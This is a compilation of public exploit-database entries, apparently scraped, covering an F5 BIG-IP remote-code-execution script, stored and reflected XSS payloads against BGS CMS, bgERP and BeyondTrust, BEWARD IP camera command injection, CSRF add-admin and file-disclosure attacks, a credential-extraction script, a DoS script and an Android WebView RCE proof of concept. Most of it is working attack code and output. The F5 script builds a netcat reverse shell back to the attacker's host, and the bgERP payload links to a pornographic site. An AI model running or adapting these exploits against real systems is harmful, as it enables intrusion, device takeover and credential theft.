conference with the ability to upload presentations. While successful
exploitation of this vulnerability would pose severe consequences for
the affected BigBlueButton instance, it is only rated to pose a medium
risk due to the requirement of having presentator access.


Timeline
========

2020-09-11 Vulnerability identified
2020-09-18 Customer approved disclosure to vendor
2020-09-22 CVE ID requested
2020-09-22 CVE ID assigned
2020-09-24 Requested encrypted communication with vendor
2020-09-25 Vendor unable to provide encrypted communication,
           Vendor notified
2020-09-25 Vendor confirmed being able to reproduce vulnerability,
           mentioned similar bugreport
2020-09-25 Requested information whether "similar burgreport"
           uses the same vulnerability - no answer
2020-10-13 Again requested information whether "similar burgreport"
           uses the same vulnerability, whether release shedule is
           known - no answer
2020-10-14 Vendor released fixed version (without mentioning vulnerability)
2020-10-21 Vulnerability published by third party [7]
2020-10-21 Advisory released


References
==========

[1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton
[2] http://opendocumentformat.org/
[3] https://www.w3.org/TR/xlink11/
[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583
[5] https://docs.bigbluebutton.org/dev/api.html#usage
[6] https://docs.bigbluebutton.org/support/faq.html#presentations
[7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen
HireHackking 
source: https://www.securityfocus.com/bid/66350/info

BIGACE Web CMS is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit these vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, use directory-traversal strings to execute local script code in the context of the application, or obtain sensitive information that may aid in further attacks.

BIGACE Web CMS 2.7.5 is vulnerable; other versions may also be affected. 

http://www.example.com/bigace_2.7.5/bigace_install_2.7.5/public/index.php?menu=3&LANGUAGE=[LFI]
HireHackking 
#!/bin/bash
#
# EDB Note Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48642.zip
# 
# Exploit Title: F5 BIG-IP Remote Code Execution
# Date: 2020-07-06
# Exploit Authors: Charles Dardaman of Critical Start, TeamARES
#                  Rich Mirch of Critical Start, TeamARES
# CVE: CVE-2020-5902
#
# Requirements:
#   Java JDK
#   hsqldb.jar 1.8
#   ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
#

if [[ $# -ne 3 ]]
then
  echo
  echo "Usage: $(basename $0) <server> <localip> <localport>"
  echo
  exit 1
fi

server=${1?hostname argument required}
localip=${2?Locaip argument required}
port=${3?Port argument required}

if [[ ! -f $server.der ]]
then
  echo "$server.der does not exist - extracting cert"
  openssl s_client \
          -showcerts \
          -servername $server \
          -connect $server:443 </dev/null 2>/dev/null | openssl x509 -outform DER >$server.der

  keytool -import \
          -alias $server \
          -keystore keystore \
          -storepass changeit \
          -noprompt \
          -file $PWD/$server.der
else
  echo "$server.der already exists. skipping extraction step"
fi

java -jar ysoserial-master-SNAPSHOT.jar \
     CommonsCollections6 \
     "/bin/nc -e /bin/bash $localip $port" > nc.class

xxd -p nc.class | xargs | sed -e 's/ //g' | dd conv=ucase 2>/dev/null > payload.hex

if [[ ! -f f5RCE.class ]]
then
  echo "Building exploit"
  javac -cp hsqldb.jar f5RCE.java
fi

java -cp hsqldb.jar:. \
     -Djavax.net.ssl.trustStore=keystore \
     -Djavax.net.ssl.trustStorePassword=changeit \
     f5RCE $server payload.hex
HireHackking 
source: https://www.securityfocus.com/bid/52983/info

BGS CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

BGS CMS 2.2.1 is vulnerable; other versions may also be affected. 

<html>
<title>BGS CMS v2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities</title>
<body bgcolor="#000000">
<script type="text/javascript">
function xss0(){document.forms["xss0"].submit();}
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
function xss6(){document.forms["xss6"].submit();}
function xss7(){document.forms["xss7"].submit();}
</script>

<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss0">
<input type="hidden" name="name" value="Zero Science Lab" />
<input type="hidden" name="title" value="XSS" />
<input type="hidden" name="description" value="Cross Site Scripting" />
<input type="hidden" name="parent_id" value="15" />
<input type="hidden" name="redirect" value='"><script>alert(1);</script>' />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="categories" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="29" />
</form>

<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="title" value="Zero Science Lab" />
<input type="hidden" name="description" value='"><script>alert(1);</script>' />
<input type="hidden" name="disp_on_full_view" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="level" value="0" />
<input type="hidden" name="type" value="ads" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="ads" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="0" />
</form>

<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="created" value="ZSL" />
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="email" value="test@test.mk" />
<input type="hidden" name="message" value="t00t" />
<input type="hidden" name="status" value="coolio" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="orders" />
<input type="hidden" name="action" value="edit" />
</form>

<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss3">
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="question" value="What is physics?" />
<input type="hidden" name="start" value="10 2012" />
<input type="hidden" name="end" value="18 2012" />
<input type="hidden" name="answer_text[]" value="A warm summer evening." />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="polls" />
<input type="hidden" name="action" value="edit" />
</form>

<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss4">
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="image" value="joxy.jpg" />
<input type="hidden" name="url" value='"><script>alert(1);</script>' />
<input type="hidden" name="max_displays" value="1" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="banners" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="9" />
</form>

<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss5">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="description" value="Ban" />
<input type="hidden" name="folder" value="sexy_banner_imgx" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="gallery" />
<input type="hidden" name="action" value="edit" />
</form>

<form action="http://www.example.com/" method="GET" id="xss6">
<input type="hidden" name="action" value="search" />
<input type="hidden" name="search" value='"><script>alert(1);</script>' />
<input type="hidden" name="x" value="0" />
<input type="hidden" name="y" value="0" />
</form>

<form action="http://www.example.com/cms/" method="GET" id="xss7">
<input type="hidden" name="section" value='"><script>alert(1);</script>' />
<input type="hidden" name="action" value="add_news" />
</form>

<br /><br />

<a href="javascript: xss0();" style="text-decoration:none">
<b><font color="red"><h3>XSS 0</h3></font></b></a><br />

<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><h3>XSS 1</h3></font></b></a><br />

<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><h3>XSS 2</h3></font></b></a><br />

<a href="javascript: xss3();" style="text-decoration:none">
<b><font color="red"><h3>XSS 3</h3></font></b></a><br />

<a href="javascript: xss4();" style="text-decoration:none">
<b><font color="red"><h3>XSS 4</h3></font></b></a><br />

<a href="javascript: xss5();" style="text-decoration:none">
<b><font color="red"><h3>XSS 5</h3></font></b></a><br />

<a href="javascript: xss6();" style="text-decoration:none">
<b><font color="red"><h3>XSS 6</h3></font></b></a><br /><br />

<a href="javascript: xss7();" style="text-decoration:none">
<b><font color="red"><h3>XSS 7</h3></font></b></a><br /><br />

</body></html>
HireHackking 
## Title:  bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 01.31.2023
## Vendor: https://bgerp.com/Bg/Za-sistemata
## Software: https://github.com/bgerp/bgerp/releases/tag/v22.31
## Reference: https://portswigger.net/kb/issues/00500b01_cookie-manipulation-reflected-dom-based

## Description:
The bgERP system suffers from unsecured login cookies in which cookies
are stored as very sensitive login and also login session information!
The attacker can trick the already login user and can steal the
already generated cookie from the system and can do VERY DANGEROUS
things with the already stored sensitive information.
This can be very expensive for all companies which are using this
system, please be careful!
Also, this system has a vulnerable search parameter for XSS-Reflected attacks!

## STATUS: HIGH Vulnerability

[+] Exploit:

```GET
GET /Portal/Show?recentlySearch_14=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%64%6c%2e%70%68%6e%63%64%6e%2e%63%6f%6d%2f%67%69%66%2f%34%31%31%36%35%37%36%31%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&Cmd%5Bdefault%5D=1
HTTP/1.1
Host: 192.168.100.77:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.100.77:8080/Portal/Show
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SID=rfn0jpm60epeabc1jcrkhgr9c3; brid=MC9tQnJQ_438f57; menuInfo=1254:l :0
Connection: close
Content-Length: 0
```

[+] Response after logout of the system:
```HTTP
HTTP/1.1 302 Found
Date: Tue, 31 Jan 2023 15:13:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: 0
Cache-Control: no-cache, must-revalidate
Location: /core_Users/login/?ret_url=bgerp%2FPortal%2FShow%2FrecentlySearch_14%2F%253Ca%2Bhref%253D%2522https%253A%252F%252Fpornhub.com%252F%2522%2Btarget%253D%2522_blank%2522%2Brel%253D%2522noopener%2Bnofollow%2Bugc%2522%253E%250A%253Cimg%2Bsrc%253D%2522https%253A%252F%252Fdl.phncdn.com%252Fgif%252F41165761.gif%253F%253Ftoken%253DGHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ%2526rs%253D1%2522%2Bstyle%253D%2522border%253A1px%2Bsolid%2Bblack%253Bmax-width%253A100%2525%253B%2522%2Balt%253D%2522Photo%2Bof%2BByron%2BBay%252C%2Bone%2Bof%2BAustralia%2527s%2Bbest%2Bbeaches%2521%2522%253E%250A%253C%252Fa%253E%2FCmd%2Cdefault%2F1%2FCmd%2Crefresh%2F1_48f6f472
Connection: close
Content-Length: 2
Content-Encoding: none
Content-Type: text/html; charset=UTF-8

OK
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bgERP/2023/brERP-v22.31-Cookie-Session-vulnerability%2BXSS-Reflected)

## Proof and Exploit:
[href](https://streamable.com/xhffdu)

## Time spent
`01:30:00`


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
HireHackking 
# Exploit Title: BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Google Dork: intext:"BeyondTrust" "Redistribution Prohibited"
# Date: 30/12/2021
# Exploit Author: Malcrove
# Vendor Homepage: https://www.beyondtrust.com/
# Version: v6.0 and earlier versions

Summary:

Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.


Vulnerability Details:

Affected Endpoint: /appliance/login
Affected Parameter: login[password]
Request Method: GET or POST


Proof of concept (POC):

By navigating to the below link from a modern web browser, alert(document.domain) Javascript method would be fired in the same context of Beyondtrust Remote Support domain.

http://<bomgar-host>/appliance/login?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password


Mitigation:

A fix has been released by the vendor in NSBase 6.1. It's recommended to update the vulnerable appliance base version to the latest version.

- Time-Line:

    April 6, 2021: Vulnerability advisory sent to the vendor (Beyondtrust)
    April 8, 2021: Recevied an initial reply from the vendor 
    Jun 10, 2021: The vendor released a fix for the vulnerability in NSbase 6.1
    Dec 30, 2021: The Responsible public disclosure


- Credits
Ahmed Aboul-Ela (Malcrove)
HireHackking 
# Exploit Title: Beyond Remote 2.2.5.3 - Denial of Service (PoC)
# Author: Erenay Gencay
# Discovey Date: 2018-09-24
# Vendor notified : 2018-09-24
# Software Link: https://beyond-remote-client-and-server.jaleco.com/
# Tested Version: 2.2.5.3
# Tested on OS: Windows XP Professional sp3 (ENG)

# Steps to Reproduce: Run the python exploit script, it will create a new file
# file with the name "mre.txt". Copy the content of the new file "mre.txt".
# Start Beyond Remote Server 2.2.5.3 and click "Configure" than click "Update Options" than 
# click "Proxy Settings" Paste the content into field "Proxy Password" click "OK"
# It will cause the DOS situation.

bof = "A" * 2000

try:

	print("payload is loading..")
	
	dosya = open('mre.txt','w')
	dosya.write(bof)
	dosya.close()
	print(" [+] File Created")

except:
	print("Someting went wrong !")
HireHackking 
BEWARD N100 H.264 VGA IP Camera M2.1.6 Unauthenticated RTSP Stream Disclosure


Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014

Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.

Desc: BEWARD N100 camera suffers from an unauthenticated and unauthorized
live RTSP video stream access.

Tested on: Boa/0.94.14rc21
           Farady ARM Linux 2.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5509
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5509.php


26.01.2019

--


http://TARGET/cgi-bin/view/image
HireHackking 
BEWARD N100 H.264 VGA IP Camera M2.1.6 Root Remote Code Execution


Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014

Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.

Desc: The camera suffers from two authenticated command injection vulnerabilities.
The issues can be triggered when calling ServerName or TimeZone GET parameters
via the servertest page. This can be exploited to inject arbitrary system commands
and gain root remote code execution.

Tested on: Boa/0.94.14rc21
           Farady ARM Linux 2.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5512
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5512.php


26.01.2019

--

---------------------------
TimeZone command injection:

root@ground:~# curl -X $'GET' -H $'Authorization: Basic YWRtaW46YWRtaW4=' $'http://TARGET/cgi-bin/operator/servetest?cmd=ntp&ServerName=pool.ntp.org&TimeZone=03:00|id||'
HTTP/1.1 200 OK
Date: Sun, 01 Jan 2012 10:15:53 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
Content-type: text/plain

ntp update
0 OK


-----------------------------
ServerName command injection:

root@ground:~# curl -X $'GET' -H $'Authorization: Basic YWRtaW46YWRtaW4=' $'http://TARGET/cgi-bin/operator/servetest?cmd=ntp&ServerName=pool.ntp.org|id||&TimeZone=03:00'
HTTP/1.1 200 OK
Date: Sun, 01 Jan 2012 10:22:11 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
Content-type: text/plain

ntp update
0 OK
HireHackking 
BEWARD N100 H.264 VGA IP Camera M2.1.6 CSRF Add Admin Exploit


Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014

Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certai actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: Boa/0.94.14rc21
           Farady ARM Linux 2.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5510
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5510.php


26.01.2019

--


<html>
  <body>
    <form action="http://TARGET/cgi-bin/admin/param">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="group" value="General.UserID" />
      <input type="hidden" name="template" value="UserID" />
      <input type="hidden" name="General.UserID.U.User" value="dGVzdDp0ZXN0MTIz,01000001" />
      <input type="submit" value="Send" />
    </form>
  </body>
</html>

Base64(test:test123) + ,01000001 for A (Admin) = dGVzdDp0ZXN0MTIz,01000001
HireHackking 
BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure

Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014

Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.

Desc: The camera suffers from an authenticated file disclosure vulnerability.
Input passed via the 'READ.filePath' parameter in fileread script is not properly
verified before being used to read files. This can be exploited to disclose
the contents of arbitrary files via absolute path or via the SendCGICMD API.

Tested on: Boa/0.94.14rc21
           Farady ARM Linux 2.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5511
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php


26.01.2019


--
From the term:
--
root@ground:~# curl -H "Authorization: Basic YWRtaW46YWRtaW4=" http://TARGET/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh

--
From the web console:
--
SendCGICMD("cgi-bin/operator/fileread?READ.filePath=/etc/passwd")
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh

--
SendCGICMD("cgi-bin/operator/fileread?READ.filePath=/etc/issue")
--
Welcome to \n (\m-\s-\r@\l/\b)
Faraday ARM Linux 2.6

Copyright (C) 2005 Faraday Corp. <www.faraday.com.tw>
Released under GNU GPL

--
wr: /usr/share/www/html
sp: /var/www/secret.passwd
bc: /etc/boa.conf
HireHackking 
#!/usr/bin/env python
# -*- coding: utf8 -*-
#
# BEWARD Intercom 2.3.1 Credentials Disclosure
#
#
# Vendor: Beward R&D Co., Ltd
# Product web page: https://www.beward.net
# Affected version: 2.3.1.34471
#                   2.3.0
#                   2.2.11
#                   2.2.10.5
#                   2.2.9
#                   2.2.8.9
#                   2.2.7.4
#
# Note: For versions above 2.2.11: The application data directory, which
# stores logs, settings and the call records archive, was moved to ProgramData\BEWARD.
#
# New versions: C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB
# Old versions: C:\Users\%username%\AppData\Local\Beward R&D Co., Ltd\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB
#
# Summary: Multiaccessible User Operation, Electronic Lock Control, Real-Time
# Video, Two-Way Audio. The software is used for BEWARD IP video door stations
# control.
#
# Desc: The application stores logs and sensitive information in an unencrypted
# binary file called BEWARD.INTERCOM.FDB. A local attacker that has access to
# the current user session can successfully disclose plain-text credentials that
# can be used to bypass authentication to the affected IP camera and door station
# and bypass access control in place.
#
# Tested on: Microsoft Windows 10 Home (EN)
#            Microsoft Windows 7 SP1 (EN)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2019-5505
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5505.php
#
#
#
#######################################################################
# Output:
# --------
# C:\> python beward_creds.py
# Username: admin
# Password: S3cr3tP4$$w0rd
# C:\> 
#
#######################################################################
#
# 28.11.2018
#

import subprocess
import mmap######
import re########
import os########

#
# For versions bellow 2.2.11:
#
# cuser = subprocess.check_output("echo %username%", shell=True)
# dbfile = ('C:\Users\\' + cuser.rstrip() + '\Ap'
#           'pData\Local\Beward R&D Co., Ltd\BEW'
#           'ARD Intercom\DB\BEWARD.INTERCOM.FDB'
#          )
#

#
# For versions 2.2.11 and above:
#

dbfile = 'C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB'

def mapfile(filename):
    file = open(filename, "r+")
    size = os.path.getsize(filename)
    return mmap.mmap(file.fileno(), size)

data = mapfile(dbfile)
m = re.search(r"\xF7\x00\x07\x05\x00(.*?)\xD3\x00\x0E\x0C\x00", data)
print "Username: " + m.group(1)
m = re.search(r"\xD3\x00\x0E\x0C\x00(.*?)\xDA\x00\x11\x0F\x00", data)
print "Password: " + m.group(1)
HireHackking 
# Exploit Title: BestSafe Browser FREE NoAds - Remote Code Execution
# Date: 30/Jun/17
# Exploit Author: MaXe
# Vendor Homepage: https://play.google.com/store/apps/details?id=a1.bestsafebrowser.com
# Software Link: See APK archive websites
# Screenshot: Refer to https://www.youtube.com/watch?v=VXNVzjsH0As
# Version: v3
# Tested on: Android 4.1.0 (Google APIs) - API Level 16 - x86
# CVE : N/A

BestSafe Browser FREE NoAds - Remote Code Execution (No MITM Required!)

Version affected: v3

App Info: The Android application reviewed, according to the developer, is "secure" and is built for a better Google experience, and is essential for those who wish to protect their right to privacy.

External Links:
https://play.google.com/store/apps/details?id=a1.bestsafebrowser.com
http://www.appsalesandsupport.com


Credits: MaXe (@InterN0T)
Special Thanks: no1special
Shouts: SubHacker and the rest of the awesome infosec community.


-:: The Advisory ::-
The Android application is vulnerable to Remote Code Execution attacks. This is caused by the following lines of code within the
\a1\bestsafebrowser\com\main.java file: (Lines 380 - 387)
    public static String _activity_create(boolean z) throws Exception {
        mostCurrent._activity.RemoveAllViews();
        Common.ProgressDialogShow(mostCurrent.activityBA, "Attempting to access the Internet");
        Phone phone = new Phone();
        main a1_bestsafebrowser_com_main = mostCurrent;
        _googleurl = "http://www.comparison.net.au";
        mostCurrent._activity.LoadLayout("Start", mostCurrent.activityBA);
        ActivityWrapper activityWrapper = mostCurrent._activity;

and

Lines 634 - 641:
    public static String _tr_tick() throws Exception {
        ...
        webViewExtras = mostCurrent._webviewextras1;
        WebViewExtras.clearCache((WebView) mostCurrent._webview1.getObject(), true);
        webViewExtras = mostCurrent._webviewextras1;
        WebViewExtras.addJavascriptInterface(mostCurrent.activityBA, (WebView) mostCurrent._webview1.getObject(), "MyEventName");
        WebViewWrapper webViewWrapper = mostCurrent._webview1;
        main a1_bestsafebrowser_com_main2 = mostCurrent;
        webViewWrapper.Loadproton-Url(_googleurl);
        str = "";

In addition to the above, the following App configuration also aids in the exploitability of this issue: (File: AndroidManifest.xml, Line: 3)
    <uses-sdk android:minSdkVersion="5" android:targetSdkVersion="14" />

If an attacker registers the domain "comparison.net.au" (it is currently NOT registered) and creates a DNS record for "www.comparison.net.au" then the attacker has full control over anyone who installs and runs this app. This vulnerability can be used to execute arbitrary Java code in the context of the application. The ".net.au" TLD requires slightly more validation during registration, in terms of a valid ABN, ACN or Trademark number. However, as this type of validation is fully automated and this type of information is public, an attacker can easily obtain another entity's ABN, ACN or Trademark number and use that to register a domain.

In addition to the above, in case someone has registered "comparison.net.au", then if an attacker performs a MITM attack against "www.comparison.net.au" by e.g. hijacking the domain name, DNS, IP prefix, or by serving a malicious wireless access point (or hijacking a legitimate one), or by hacking the server at "www.comparison.net.au", then the attacker can also abuse this vulnerability.

The root cause of this vulnerability is caused by addJavascriptInterface() within the WebViewer, which in older API versions can be used to execute arbitrary Java code by using reflection to access public methods with attacker provided JavaScript.


-:: Proof of Concept ::-
A successful attack that makes "www.comparison.net.au" serve the following code:
<script>
  function execute(cmd){
    return MyEventName.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmd);
  }
  execute(['/system/bin/sh', '-c', 'echo InterN0T was here > /data/data/a1.bestsafebrowser.com/owned']);
  execute(['/system/bin/sh', '-c', 'am start -a android.intent.action.VIEW -d "http://attacker-domain.tld/video.mp4"']);
  </script>
  This application has been owned.

Will make the Android application create a new file in the App directory named: owned, and also play a video chosen by the attacker as an example.

Instead of creating a new file, the attacker can also use the "drozer" payload for example. Refer to the references further below.


-:: Solution ::-
The Android app code should not use the addJavaScriptInterface() function. Instead the following code should be used:
    WebView webView = new WebView(this);
    setContentView(webView);
    ...
Alternatively, the application manifest should specify API levels JELLY_BEAN_MR1 and above as follows:
    <manifest>
    <uses-sdk android:minSdkVersion="17" />
    ...
    </manifest>

The URL used ("http://www.comparison.net.au") should ALSO use HTTPS (and verify the hostname and certificate properly).

Last but not least, the following code can also be used to determine whether the addJavascriptInterface should be enabled or not:
    private void exposeJsInterface() {
        if (VERSION.SDK_INT < 17) {
            Log.i(TAG, "addJavascriptInterface() bridge disabled.");
        } else {
            addJavascriptInterface(Object, "EVENT_NAME_HERE");
        }
    }



References:
